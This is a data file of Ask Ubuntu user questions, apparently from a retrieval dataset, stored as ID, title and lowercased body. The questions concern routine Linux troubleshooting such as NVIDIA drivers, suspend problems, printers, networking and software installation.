507082	hibernation error - could not write byte : broken pipe	suddenly , right after `` turning on '' my ubuntu 12.04 from hibernation , there was an error could not write bytes : broken pipes which led to a black screen so i had to reboot . after rebooting , i got the same error message but my screen was working fine . i hibernated again my laptop , just to check and there was n't any error at that time , but i am experiencing something weird . i type my password , only to see a black screen with a mouse pointer , which obbeys every movement i do . i also increased/decreased the volume and i was able to hear the sound effect . what i did was the trying to `` reinstall '' nvidia drivers ( my graphics card is nvidia 8600m gs ) using ctrl-alt-f1 ( to get a cli ) sudo apt-get update sudo apt-get purge nvidia-* sudo apt-get install invida-current-updates but when i reach step 4 , i get sth about dependencies on nvidia 304 or something similar . any idea on why this is happening only after hibernation and how to fix it ? edit i also run sudo apt-get update & & sudo apt-get dist-upgrade and the output is hit http : //dl.google.com stable release.gpg hit http : //archive.canonical.com precise release.gpg hit http : //extras.ubuntu.com precise release.gpg hit http : //ppa.launchpad.net precise release.gpg hit http : //ppa.launchpad.net precise release.gpg hit http : //ppa.launchpad.net precise release.gpg hit http : //ppa.launchpad.net precise release.gpg hit http : //dl.google.com stable release.gpg hit http : //archive.canonical.com precise release hit http : //extras.ubuntu.com precise release hit http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise release hit http : //dl.google.com stable release hit http : //archive.canonical.com precise/partner sources hit http : //ppa.launchpad.net precise release hit http : //extras.ubuntu.com precise/main sources hit http : //dl.google.com stable release hit http : //archive.canonical.com precise/partner i386 packages ign http : //archive.canonical.com precise/partner translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //extras.ubuntu.com precise/main i386 packages ign http : //extras.ubuntu.com precise/main translationindex hit http : //dl.google.com stable/main i386 packages ign http : //dl.google.com stable/main translationindex hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //dl.google.com stable/main i386 packages ign http : //dl.google.com stable/main translationindex hit http : //archive.ubuntu.com precise release.gpg get:1 http : //archive.ubuntu.com precise-updates release.gpg [ 198 b ] hit http : //archive.ubuntu.com precise-backports release.gpg get:2 http : //archive.ubuntu.com precise-security release.gpg [ 198 b ] hit http : //archive.ubuntu.com precise release get:3 http : //archive.ubuntu.com precise-updates release [ 98.7 kb ] ign http : //archive.canonical.com precise/partner translation-en_us ign http : //extras.ubuntu.com precise/main translation-en_us ign http : //archive.canonical.com precise/partner translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //extras.ubuntu.com precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //dl.google.com stable/main translation-en_us ign http : //dl.google.com stable/main translation-en ign http : //dl.google.com stable/main translation-en_us ign http : //dl.google.com stable/main translation-en hit http : //archive.ubuntu.com precise-backports release get:4 http : //archive.ubuntu.com precise-security release [ 50.7 kb ] hit http : //archive.ubuntu.com precise/main i386 packages hit http : //archive.ubuntu.com precise/restricted i386 packages hit http : //archive.ubuntu.com precise/universe i386 packages hit http : //archive.ubuntu.com precise/multiverse i386 packages hit http : //archive.ubuntu.com precise/main translationindex hit http : //archive.ubuntu.com precise/multiverse translationindex hit http : //archive.ubuntu.com precise/restricted translationindex hit http : //archive.ubuntu.com precise/universe translationindex get:5 http : //archive.ubuntu.com precise-updates/main i386 packages [ 854 kb ] get:6 http : //archive.ubuntu.com precise-updates/restricted i386 packages [ 13.7 kb ] get:7 http : //archive.ubuntu.com precise-updates/universe i386 packages [ 252 kb ] get:8 http : //archive.ubuntu.com precise-updates/multiverse i386 packages [ 15.5 kb ] hit http : //archive.ubuntu.com precise-updates/main translationindex hit http : //archive.ubuntu.com precise-updates/multiverse translationindex hit http : //archive.ubuntu.com precise-updates/restricted translationindex hit http : //archive.ubuntu.com precise-updates/universe translationindex hit http : //archive.ubuntu.com precise-backports/main i386 packages hit http : //archive.ubuntu.com precise-backports/restricted i386 packages hit http : //archive.ubuntu.com precise-backports/universe i386 packages hit http : //archive.ubuntu.com precise-backports/multiverse i386 packages hit http : //archive.ubuntu.com precise-backports/main translationindex hit http : //archive.ubuntu.com precise-backports/multiverse translationindex hit http : //archive.ubuntu.com precise-backports/restricted translationindex hit http : //archive.ubuntu.com precise-backports/universe translationindex get:9 http : //archive.ubuntu.com precise-security/main i386 packages [ 442 kb ] get:10 http : //archive.ubuntu.com precise-security/restricted i386 packages [ 4,620 b ] get:11 http : //archive.ubuntu.com precise-security/universe i386 packages [ 101 kb ] get:12 http : //archive.ubuntu.com precise-security/multiverse i386 packages [ 2,650 b ] hit http : //archive.ubuntu.com precise-security/main translationindex hit http : //archive.ubuntu.com precise-security/multiverse translationindex hit http : //archive.ubuntu.com precise-security/restricted translationindex hit http : //archive.ubuntu.com precise-security/universe translationindex hit http : //archive.ubuntu.com precise/main translation-en hit http : //archive.ubuntu.com precise/multiverse translation-en hit http : //archive.ubuntu.com precise/restricted translation-en hit http : //archive.ubuntu.com precise/universe translation-en hit http : //archive.ubuntu.com precise-updates/main translation-en hit http : //archive.ubuntu.com precise-updates/multiverse translation-en hit http : //archive.ubuntu.com precise-updates/restricted translation-en hit http : //archive.ubuntu.com precise-updates/universe translation-en hit http : //archive.ubuntu.com precise-backports/main translation-en hit http : //archive.ubuntu.com precise-backports/multiverse translation-en hit http : //archive.ubuntu.com precise-backports/restricted translation-en hit http : //archive.ubuntu.com precise-backports/universe translation-en hit http : //archive.ubuntu.com precise-security/main translation-en hit http : //archive.ubuntu.com precise-security/multiverse translation-en hit http : //archive.ubuntu.com precise-security/restricted translation-en hit http : //archive.ubuntu.com precise-security/universe translation-en fetched 1,835 kb in 3min 41s ( 8,287 b/s ) reading package lists ... done reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . edit 2 sudo apt-get purge nvidia* reading package lists ... done building dependency tree reading state information ... done note , selecting 'nvidia-173-updates ' for regex 'nvidia*' note , selecting 'nvidia-current ' for regex 'nvidia*' note , selecting 'nvidia-libvdpau-ia32 ' for regex 'nvidia*' note , selecting 'nvidia-cuda-debugger ' for regex 'nvidia*' note , selecting 'nvidia-libvdpau1 ' for regex 'nvidia*' note , selecting 'nvidia-glx-dev ' for regex 'nvidia*' note , selecting 'nvidia-173 ' for regex 'nvidia*' note , selecting 'nvidia-304 ' for regex 'nvidia*' note , selecting 'nvidia-96-updates-dev ' for regex 'nvidia*' note , selecting 'nvidia-319 ' for regex 'nvidia*' note , selecting 'nvidia-331 ' for regex 'nvidia*' note , selecting 'nvidia-settings-updates ' for regex 'nvidia*' note , selecting 'nvidia-settings-304-updates ' for regex 'nvidia*' note , selecting 'nvidia-libopencl1-dev ' for regex 'nvidia*' note , selecting 'nvidia-settings ' for regex 'nvidia*' note , selecting 'nvidia-libopencl1 ' for regex 'nvidia*' note , selecting 'nvidia-vdpau-driver ' for regex 'nvidia*' note , selecting 'nvidia-96-dev ' for regex 'nvidia*' note , selecting 'nvidia-opencl-profiler ' for regex 'nvidia*' note , selecting 'nvidia-cg-toolkit ' for regex 'nvidia*' note , selecting 'nvidia-96 ' for regex 'nvidia*' note , selecting 'nvidia-libvdpau1-ia32 ' for regex 'nvidia*' note , selecting 'nvidia-173-updates-dev ' for regex 'nvidia*' note , selecting 'nvidia-331-updates ' for regex 'nvidia*' note , selecting 'nvidia-96-updates ' for regex 'nvidia*' note , selecting 'nvidia-331-dev ' for regex 'nvidia*' note , selecting 'nvidia-experimental-304 ' for regex 'nvidia*' note , selecting 'nvidia-experimental-310 ' for regex 'nvidia*' note , selecting 'libkwinactivenvidiahack4 ' for regex 'nvidia*' note , selecting 'nvidia-prime ' for regex 'nvidia*' note , selecting 'nvidia-180-modaliases ' for regex 'nvidia*' note , selecting 'nvidia-cuda-profiler ' for regex 'nvidia*' note , selecting 'nvidia-current-updates ' for regex 'nvidia*' note , selecting 'nvidia-opencl-dev ' for regex 'nvidia*' note , selecting 'nvidia-current-updates-dev ' for regex 'nvidia*' note , selecting 'libkwinnvidiahack4 ' for regex 'nvidia*' note , selecting 'nvidia-opencl-icd ' for regex 'nvidia*' note , selecting 'nvidia-libvdpau ' for regex 'nvidia*' note , selecting 'nvidia-304-updates-dev ' for regex 'nvidia*' note , selecting 'nvidia-319-updates ' for regex 'nvidia*' note , selecting 'boinc-nvidia-cuda ' for regex 'nvidia*' note , selecting 'nvidia-current-dev ' for regex 'nvidia*' note , selecting 'nvidia-compute-profiler ' for regex 'nvidia*' note , selecting 'nvidia-331-uvm ' for regex 'nvidia*' note , selecting 'nvidia-331-updates-dev ' for regex 'nvidia*' note , selecting 'nvidia-experimental-304-dev ' for regex 'nvidia*' note , selecting 'nvidia-settings-304 ' for regex 'nvidia*' note , selecting 'nvidia-settings-319 ' for regex 'nvidia*' note , selecting 'nvidia-va-driver ' for regex 'nvidia*' note , selecting 'nvidia-current-modaliases ' for regex 'nvidia*' note , selecting 'nvidia-173-modaliases ' for regex 'nvidia*' note , selecting 'nvidia-185-modaliases ' for regex 'nvidia*' note , selecting 'nvidia-319-dev ' for regex 'nvidia*' note , selecting 'nvidia-texture-tools ' for regex 'nvidia*' note , selecting 'nvidia-304-dev ' for regex 'nvidia*' note , selecting 'nvidia-common ' for regex 'nvidia*' note , selecting 'nvidia-tegra ' for regex 'nvidia*' note , selecting 'nvidia-settings-319-updates ' for regex 'nvidia*' note , selecting 'nvidia-331-updates-uvm ' for regex 'nvidia*' note , selecting 'nvidia-cuda-dev ' for regex 'nvidia*' note , selecting 'nvidia-cuda-doc ' for regex 'nvidia*' note , selecting 'nvidia-cuda-gdb ' for regex 'nvidia*' note , selecting 'nvidia-304-updates ' for regex 'nvidia*' note , selecting 'nvidia-experimental-310-dev ' for regex 'nvidia*' note , selecting 'nvidia-cuda-toolkit ' for regex 'nvidia*' note , selecting 'nvidia-libvdpau-dev ' for regex 'nvidia*' note , selecting 'libgl1-nvidia-alternatives ' for regex 'nvidia*' note , selecting 'nvidia-96-modaliases ' for regex 'nvidia*' note , selecting 'nvidia-glx ' for regex 'nvidia*' note , selecting 'nvidia-settings-experimental-304 ' for regex 'nvidia*' note , selecting 'nvidia-settings-experimental-310 ' for regex 'nvidia*' note , selecting 'nvidia-173-dev ' for regex 'nvidia*' note , selecting 'nvidia-319-updates-dev ' for regex 'nvidia*' note , selecting 'libnvtt-bin ' instead of 'nvidia-texture-tools' note , selecting 'vdpau-va-driver ' instead of 'nvidia-va-driver' package nvidia-96-updates is not installed , so not removed package nvidia-96-updates-dev is not installed , so not removed package nvidia-cg-toolkit is not installed , so not removed package libkwinactivenvidiahack4 is not installed , so not removed package libkwinnvidiahack4 is not installed , so not removed package nvidia-common is not installed , so not removed package nvidia-prime is not installed , so not removed package nvidia-settings is not installed , so not removed package nvidia-settings-304 is not installed , so not removed package nvidia-settings-304-updates is not installed , so not removed package nvidia-settings-319 is not installed , so not removed package nvidia-settings-319-updates is not installed , so not removed package nvidia-settings-experimental-304 is not installed , so not removed package nvidia-settings-experimental-310 is not installed , so not removed package nvidia-173 is not installed , so not removed package nvidia-173-dev is not installed , so not removed package nvidia-173-updates is not installed , so not removed package nvidia-173-updates-dev is not installed , so not removed package nvidia-304 is not installed , so not removed package nvidia-304-dev is not installed , so not removed package nvidia-304-updates is not installed , so not removed package nvidia-304-updates-dev is not installed , so not removed package nvidia-319 is not installed , so not removed package nvidia-319-dev is not installed , so not removed package nvidia-319-updates is not installed , so not removed package nvidia-319-updates-dev is not installed , so not removed package nvidia-331 is not installed , so not removed package nvidia-331-dev is not installed , so not removed package nvidia-331-updates is not installed , so not removed package nvidia-331-updates-dev is not installed , so not removed package nvidia-331-updates-uvm is not installed , so not removed package nvidia-331-uvm is not installed , so not removed package nvidia-96 is not installed , so not removed package nvidia-96-dev is not installed , so not removed package nvidia-current is not installed , so not removed package nvidia-current-dev is not installed , so not removed package nvidia-current-updates is not installed , so not removed package nvidia-current-updates-dev is not installed , so not removed package nvidia-experimental-304 is not installed , so not removed package nvidia-experimental-304-dev is not installed , so not removed package nvidia-experimental-310 is not installed , so not removed package nvidia-experimental-310-dev is not installed , so not removed package nvidia-settings-updates is not installed , so not removed package nvidia-compute-profiler is not installed , so not removed package nvidia-cuda-dev is not installed , so not removed package nvidia-cuda-doc is not installed , so not removed package nvidia-cuda-gdb is not installed , so not removed package nvidia-cuda-toolkit is not installed , so not removed package nvidia-opencl-dev is not installed , so not removed package boinc-nvidia-cuda is not installed , so not removed the following packages were automatically installed and are no longer required : fonts-gfs-gazis latex-cjk-chinese-arphic-gbsn00lp thunderbird-globalmenu ttf-gfs-neohellenic ttf-gfs-didot-classic ttf-gfs-baskerville ttf-sil-gentium ttf-gfs-didot gir1.2-ubuntuoneui-3.0 linux-headers-3.2.0-52 fonts-gfs-theokritos linux-headers-3.2.0-52-generic-pae fonts-gfs-didot fonts-gfs-solomos preview-latex-style latex-cjk-chinese-arphic-bkai00mp ruby1.8 fonts-gfs-olga ttf-gfs-bodoni-classic ruby ttf-gfs-olga libubuntuoneui-3.0-1 ttf-gfs-porson dkms fonts-gfs-didot-classic ttf-gfs-artemisia ttf-gfs-solomos fonts-gfs-porson linux-headers-3.5.0-23 fonts-gfs-neohellenic fonts-gfs-artemisia fonts-gfs-bodoni-classic fonts-gfs-baskerville screen-resolution-extra lcdf-typetools libvdpau1 latex-cjk-chinese-arphic-gkai00mp ttf-gfs-gazis libkms1 libruby1.8 tex-gyre swath ko.tex-extra-hlfont ttf-gfs-theokritos linux-headers-3.5.0-23-generic libreadline5 latex-cjk-chinese-arphic-bsmi00lp pfb2t1c2pfb openjdk-7-jre-lib texinfo use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . sudo apt-get install nvidia-current reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : nvidia-current : depends : nvidia-304 but it is not going to be installed e : unable to correct problems , you have held broken packages . sudo apt-get install nvidia-304 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : nvidia-304 : depends : xorg-video-abi-11 or xorg-video-abi-12 but it is not installable or xorg-video-abi-13 or xorg-video-abi-14 e : unable to correct problems , you have held broken packages . so i installed xorg-video-abi-11 , later nvidia-304 and then nvidia-current
507093	`` focus application '' keyboard shortcut in lubuntu ( lxde )	in unity , pressing super + 1 to 9 launches or switches focus to an application . can i assign a keyboard shortcut with a similar property in lubuntu ( i.e . in lxde ) ? more precisely , can i set up a shortcut such that if the application is already opened then focus will switch to it and the workspace will change accordingly ( like in unity ) ? so far i have only managed to assign a shortcut that launches ( a new instance of ) the application .
507095	nvidia ( bumblebee ) failed to load after install latest intel driver	everything was just fine . i have updated intel driver using this installer . after installing the driver it was asked to restart and i did . now optirun is not working . intel driver looks good i think . i run dpkg-reconfigure for bumblebee , bbswitch-dkms and nvidia-340 but nothings helps . also restart the system couple of times . i found the following errors . $ optirun firefox [ 117.439917 ] [ error ] can not access secondary gpu - error : could not load gpu driver [ 117.439954 ] [ error ] aborting because fallback start is disabled . $ dmesg | tail [ 117.506015 ] nvidia : unknown symbol drm_gem_prime_handle_to_fd ( err -22 ) [ 117.506034 ] nvidia : disagrees about version of symbol drm_gem_private_object_init [ 117.506036 ] nvidia : unknown symbol drm_gem_private_object_init ( err -22 ) [ 117.506106 ] nvidia : disagrees about version of symbol drm_gem_handle_create [ 117.506107 ] nvidia : unknown symbol drm_gem_handle_create ( err -22 ) [ 117.506161 ] nvidia : disagrees about version of symbol drm_pci_exit [ 117.506162 ] nvidia : unknown symbol drm_pci_exit ( err -22 ) [ 117.506187 ] nvidia : disagrees about version of symbol drm_gem_prime_export [ 117.506188 ] nvidia : unknown symbol drm_gem_prime_export ( err -22 ) system information : ubuntu 14.04 64bit $ lspci | grep `` vga\|3d '' 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) 04:00.0 3d controller : nvidia corporation gk208m [ geforce gt 740m ] ( rev a1 ) $ dpkg -- get-selections | grep -v deinstall | grep `` bumblebee\|nvidia-\|bbswitch '' bbswitch-dkms install bumblebee install bumblebee-nvidia install nvidia-340 install nvidia-settings
507097	screen flickers on live boot : dell inspiron 1440 : ubuntu 12.04 / 13.10 / 14.04	when booting from ubuntu live usb , the screen fickers ( right on the ubuntu logo ) very fast and the boot process hangs . i have tried to boot the following versions but all of them have the same issue . ubuntu gnome 14.04 ubuntu 14.04 ubuntu gnome 13.10 ubuntu 12.04 i have tried the boot options `` nomodeset '' , `` acpi_backlight = vendor '' . but none of these seem to work . this machine has come with a preinstalled windows 7 . however , i have a working ubuntu 9.04 on this .
507099	why do weird printers show up in the ubuntu printing dialog ?	after upgrading from ubuntu 13.04 to 14.04 the system printing dialog shows printers i never installed : '' farblaser '' and `` laser '' are printers i installed , the other two show up out of nowhere . neither the cups web interface nor system-config-printer shows them , even with view/discovered printers enabled . browsing off is already in the cups config file . printing dialogs other than the system one , e.g . libreoffice ( sic ) , do n't show them either . as it turns out , these are two network printers in our lan . i can send print jobs to them , even though printing a pdf from evince results in the the pdf binary being printed -- ouch . following this answer , it 's clear where the printer names come from ; avahi-browse -a | grep printer finds our network printers and assigns them ids of the form [ bdxxxx ] which match the printer names ( which i partly blurred out ) . disabling a whole service with multiple uses seems like overkill . how can i disable this behaviour of the printing dialog ?
507100	nfs and usrquota on ubuntu 14.04.1 lts	i may miss a point . after upgrading from 12x to 14.04.1 , my /users refuse to mount due to usrquota option . if i remove this options from /etc/fstab , mount is done ... when i use usrquota option , i get this error message : mount /users mount.nfs : an incorrect mount option was specified can you help me to understand my mistake ? thanks a lot .
507101	matlab r2014a on ubuntu 12.04 installation issue ( badmatch . x_putimage )	i am trying to install matlab r2014a on ubuntu 12.04 with gnome . however it says : user @ server : ~/temp/r2014a $ sudo ./install -v preparing installation files ... - > dvd = /home/user/temp/r2014a - > arch = glnxa64 - > display = :11.0 - > testonly = 0 - > jre_loc = /tmp/mathworks_26486/sys/java/jre/glnxa64/jre - > ld_library_path = /tmp/mathworks_26486/bin/glnxa64 command to run : /tmp/mathworks_26486/sys/java/jre/glnxa64/jre/bin/java -xmx512m -splash : '' /home/user/temp/r2014a/java/splash.png '' -djava.ext.dirs=/tmp/mathworks_26486/sys/java/jre/glnxa64/jre/lib/ext : /tmp/mathworks_26486/java/jar : /tmp/mathworks_26486/java/jar/ja_jp : /tmp/mathworks_26486/java/jar/zh_cn : /tmp/mathworks_26486/java/jar/ko_kr : /tmp/mathworks_26486/java/jarext : /tmp/mathworks_26486/java/jarext/guice : /tmp/mathworks_26486/java/jarext/webservices : /tmp/mathworks_26486/java/jarext/webservices/ws_client_core : /tmp/mathworks_26486/java/jarext/webservices/mcr_dws_client : /tmp/mathworks_26486/java/jarext/axis2 com/mathworks/professionalinstaller/launcher -root `` /home/user/temp/r2014a '' -tmpdir `` /tmp/mathworks_26486 '' installing ... x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 72 ( x_putimage ) serial number of failed request : 42 current serial number in output stream : 46 finished any ideas ?
507102	xrdp vserver not connecting	i have bought a vserver recently . now i can connect via putty . also i can login . i installed ubuntu-desktop and xrdp via apt-get install . i have done that all on putty console . i even restarted xrdp . now when i run the xrdp service , i can not connect via mstsc.exe with user root . following error messages occured : the connection can not be established . remoteaccess is on server deactivated remotecomputer is turend off remotecomputer is not in the network i also added the incoming firewallrule for port 3389 in my server management tool . i am using linux for first time .
507104	resume from suspend requires hard reset	most of the threads i 've found relating to this problem state that the machine powers up but the screen remains black . not so in my case . the problem i am experiencing is this . when testing the suspend , everything works as expected . computer enters sleep and i can resume from usb . but testing is usually for a short duration . when i leave the computer in sleep for any length of time ( shortest i 've noticed but may be less is 1 hour ) it will not wake up or power up . i do notice the led on my case fan flash once , but other than that there is nothing . so , of course , there are no error logs . in addition to this , the reset button does not work neither does holding the power button . i have to physically cut the power , after which i can do a normal reboot . i 'm on a clean install of ubuntu 14.04 , with a radeon hd6790 graphics card . thinking it may be related to the graphics card i 've tried both the catalyst v.12 and the beta v.14 . all i can think is that it must be some setting used to enter suspend which is causing the problem . can anybody suggest a way to remedy the problem or something else i can try ?
507105	how do i get ubuntu linux 14..04 to recognize my kindle fire hd ?	i already tried gmtp . it does n't see the device . i also tried the longer route at itsfoss.com . that method did n't work , either , possibly because 14.04 did n't recognize a couple of the commands . ( ? ) i have a new dell inspiron 15 that it wo n't work on . oddly enough , the dell inspiron 10 i had automatically loaded the kindle 's hard drive . i tried reinstalling 14.04 . did n't help . i 'm absolutely dumbfounded . does anybody have an idea what may be wrong ?
507108	ubuntu : xfce or lxde ?	which one is the faster and will i get all the features of ubuntu on them ? i 've done a little homework too on it , i think xfce will be the better option . my pc specs are n't good enough to handle unity , as it hangs very often .
507109	ca n't access internet through wifi router d-link dir-600l	i have a bsnl broadband internet type1 modem , from where i connect a d-link dir-600l n150 router . i configured my router on windows 8.1 platform . since my laptop has a dual boot system , my laptop accesses the internet perfectly when using windows but when using ubuntu , the system connects to the wifi network , but when i connect to any website , the browser displays `` server not found '' ... .both via mozilla and google chromium . kindly help ...
507110	connect to printer directly / locally via ethernet port	my decision was to get away from windows rigth to the newsest ubuntu 14.04.1 - so i am new to linux , but : trying to connect my locally , via ethernet cable attached printer ( an old model kyocera fs 1200 with ethernet network card in the printer ) i was not successful . . ) what i know is the ip address of my printer . . ) cups-management is principally working . . ) my internet connection is through wifi so my pcs ethernet port ( rj45 ) is available , the cable is attached to the printers ethernet card ; in my prior windows installation the constellation was working . please can you give my some hints / steps how to acheive this ? do i need to use a special device uri ? best regards and thank you in advance , joerg
507111	huawei e303c modem driver not working	i have ubuntu 14.04 . i was not able to install huawei e303c modem driver ... but by this method i was able to install it . how to install ndis driver for huawei mobile broadband devices ? but now after install i dont know how to connect it . whenever i plug the modem nothing happens only a mobile partner drive comes . i install a gui app from centre for ussd /call /etc but it says no device found . what to do ?
507112	created wifi network not showing on other devices	i run ubuntu 14.04. my wireless is working fine . but when i create a wifi network on my laptop , it creates successfully , but other devices cant see it even when i try to connect to a hidden network . how can i make the wire less show successfully ?
507113	issue creating bootable usb using dd command	it 's a while that i 'm trying to create a bootable usb drive with a windows on it . i first tried with unebootin unsuccessfully , i reckon the reason is the fact that the last version does n't support any more the `` show all drivers '' option , which was necessary for the application to recognize usb drives formatted to ntfs using gparted . and apparently to create windows bootable usb drives the ntfs format is required , otherwise it wo n't boot ... then i 've tried , carefully following the instructions that i 've picked up on the internet , to do it on the terminal using the dd command . but then again , so far no luck . here 's the details : dd if=/home/gigi/windows/windows.iso of=/dev/sdb1 ibs=4b obs=1b conv=notrunc , noerror but here what the terminal then prompts : dd : failed to open â/dev/sdb1â : permission denied what permission ? anyone can help telling me what i 'm missing ? cheers in advance .
507114	how to display documents autofiltered by file type ?	i am trying to create either a script or a desktop window which automatically filters documents by file type ( *.pdf , *.doc , *.xls etc . ) i know it is possible , using find or locate in the terminal , to list e.g . all pdfs in the terminal , but this is not what i 'm looking for . i want the filtered documents to be displayed in eg pcmanfm , thunar or catfish - so they are ready to be sorted , opened , copied etc . i know that i can run the pcmanfm search dialog in the terminal by using `` pcmanfm -f '' , but would it be possible to create a script which runs this command and inserts and executes eg . `` *.doc '' as a search criteria ? any help much appreciated ?
507115	starting xubuntu session from startxfce4	i am trying to start a xubuntu session from a remote connection , in my specific case is through freenx . if i use as custom command startxfce4 it runs an xfce session , with the old tall panel on the bottom and a wide menu button on the top panel , on the left end . my question is : how can i start a xubuntu session , so without the bottom panel and the new menu button ? i 'm running xubuntu 14.04 .
507116	prevent components from becoming transparent on a qml window	here is the code for a transparent and frameless window in qml : import qtquick 2.2 import qtquick.window 2.1 import ubuntu.components 0.1 window { mousearea { anchors.fill : parent // move window on drag property real lastmousex : 0 property real lastmousey : 0 onpressed : { lastmousex = mousex lastmousey = mousey } onmousexchanged : window1.x += ( mousex - lastmousex ) onmouseychanged : window1.y += ( mousey - lastmousey ) } id : window1 title : `` transparent '' height : 200 width : 400 // flags : qt.framelesswindowhint flags : qt.popup color : ' # efeded' opacity : 0.3 x : ( screen.width / 2 ) - ( window1.width / 2 ) y : ( screen.height / 2 ) - ( window1.height / 2 ) text { id : text1 text : `` hello world '' font.bold : true style : text.raised font.pointsize : 24 color : `` black '' anchors.horizontalcenter : parent.horizontalcenter y : 40 } button { id : button1 text : `` close '' anchors.left : parent.left anchors.leftmargin : 0 anchors.right : parent.right anchors.rightmargin : 0 y : 160 onclicked : { window1.close ( ) } } } the result : so is it possible to prevent the button and the text from becoming transparent ? only the background of the window should be transparent .
507118	which ubuntu version works fine with sis driver 671 771	i unfortunately have notebook asus k50c which uses a sis graphics driver . i tried many different options from different forums but i am still having screen resolution problems . its screen resolution is still really low . despite that , i can not watch any kind of video as computer becomes overloaded is not able to play the video normally . i am currently using ubuntu 14.04 . can anyone help me to solve the problems or does anybody know which version of ubuntu works fine with this computer ? thanks in advance
507121	fujitsu h270 under ubuntu 14.04 shutdown by 1 hour remaining battery	my fujitsu h270 shuts down alway with a 1:00 hours remaining battery power . gnome settings is set to percent , percent low is set to 30 % i 've tried everything i 've fouund in askubuntu and other places without success any idea if there are any other settings which i should change ? thanks a lot for your answers
507122	how to change keyboard shortcut for switching between windows of the same application ?	i am using ubuntu 14.04 . i can press alt+| to switch windows of the same application . how can i change this keyboard shortcut to something else ? i have tried using gnome control center under system settings- > keyboard- > shortcuts- > navigation and the compizconfig settings manager ( ccsm ) .
507123	problems with dual boot om packard bell te69bm	i want to install ubuntu on a packard bell easynote te 69 bm . go into the bios and will change the boot mode but it is not possible . there 's only one option uefi and secure boot , i can not change . anyone know how to access and modify this ? ? ? ? have now managed to put secure boot to disable . has done just about everything that is in these three descriptions . 2 : http : //itsfoss.com/create-live usb o ... tu-in-windows/ 3 : http : //itsfoss.com/install-ubuntu-14 ... ows-8-81-uefi/ sorry , can not post more than 2 links but still can not boot from usb , n when i go into the boot manager so there are only 1 : windows boot manager and 2 network boot . when i go into the windows ( flag + c ) `` change computer settings '' `` update / restore '' `` restore '' `` advanced start '' `` restart '' `` use a device '' `` efi usb device '' so it will come up after some time `` system does't have any usb boot option . please select other boot options '' responds ok and the computer restarts and goes into windows . what do i do wrong ? has anyone solved this problem ? and how did you do that ? ? ?
507126	2nd harddrive , /var/lib/mysql ownder is nvidia-persistenced when mounted , mysql when booted ?	i have a second hdd that was my old os . when i boot it the /var/lib/mysql folder is mysql : mysql but when i mount it ( lvm ) in my new os it is nvidia-persistenced : vboxusers . i want to do a cp -pr to the new system but can not when the permissions are like this . any ideas ?
507128	tracking message issue with huawei e398	we are developing lte enb base station and it is not ready yet . we are testing our system with huawei e398u-15 4g usb dongles . but it is very hard to follow the messages between usb dongle and our enb . are there any user interface which we can trace these messages ( like logging mechanism ) ? can anybody here give some advice ? thank you .
507129	keyboard and mouse wont work in gui and recovery mode	i just did a fresh install of ubuntu 12.04 . when i get to the login screen , my keyboard and mouse wo n't work . i tried to go to recovery mode through grub but the keyboard wont work on the recovery menu gui . how do i go around it ? thanks in advance !
507131	mod_python and apache 2.4	i have upgraded my server from ubuntu 10.04 to 12.04 . everything is ok , but there is used apache 2.4 . but mod python require apache 2.2 : ( i have old version of trac ( issue tracking system ) . is there any way how to make it works on new apache 2.4 ? previous configureation is < virtualhost *:80 > documentroot /srv/www/trac servername trac.local.net < location / > sethandler mod_python pythoninterpreter main_interpreter pythonhandler trac.web.modpython_frontend pythonoption tracenv /srv/www/trac/env pythonoption tracuriroot / < /location > < location /login > authtype basic authname `` mycompany trac server '' authuserfile /srv/www/trac/htpasswd require valid-user < /location > pythondebug on < /virtualhost >
507135	annoying popup in 14.04	when i hit alt+tab a little window pops up displaying icons of the running apps allowing me to move between them . i do not know what it is called . my problem is it keeps popping up spontaneously without me hitting alt+tab . is there some way to stop this ?
507139	skype sign in : server connect failed	when i try signing in to skype , i get the message `` sign in failed - server connect failed '' . to resolve this issue i tried almost everything , from removing skype completely to install skype again and again from 'ubuntu software center ' , downloading the latest skype .deb file and running it on my machine , etc . but every time the result is the same.my ubuntu version is 12.04.any help will be much appreciated .
507140	install grub2-efi bootloader to image after install and before restart	i want to install ubuntu 14.04 on a usb3 32gb sandisk exreme . i disconnect internal hdd during install . no problem with install . i boot installed flash drive on other pc ok my pc is hp dv7 and only booton grub2-efi bootloader . i must install grub2-efi bootloader after install and before restart . i need step by step instructions after ctrl+alt+f2 command . thanks i use 3 partition : / , /boot , swap . bootloader will go into root parttition .
507141	upgrade ubuntu next to windows	on my pc are two systems , win 7 and ubuntu 13.10 now i want to upgrade ubuntu on version 14.04 , now i wonder if it 's totally ok , if i pick the installation option `` upgrade ubuntu 13.10 to ubuntu 14.04 '' , or if this could kill my windows partition . normally i would have pick `` something else '' and installed it per hand , but now i would like to keep my personal stuff from ubuntu . thank you for your help : )
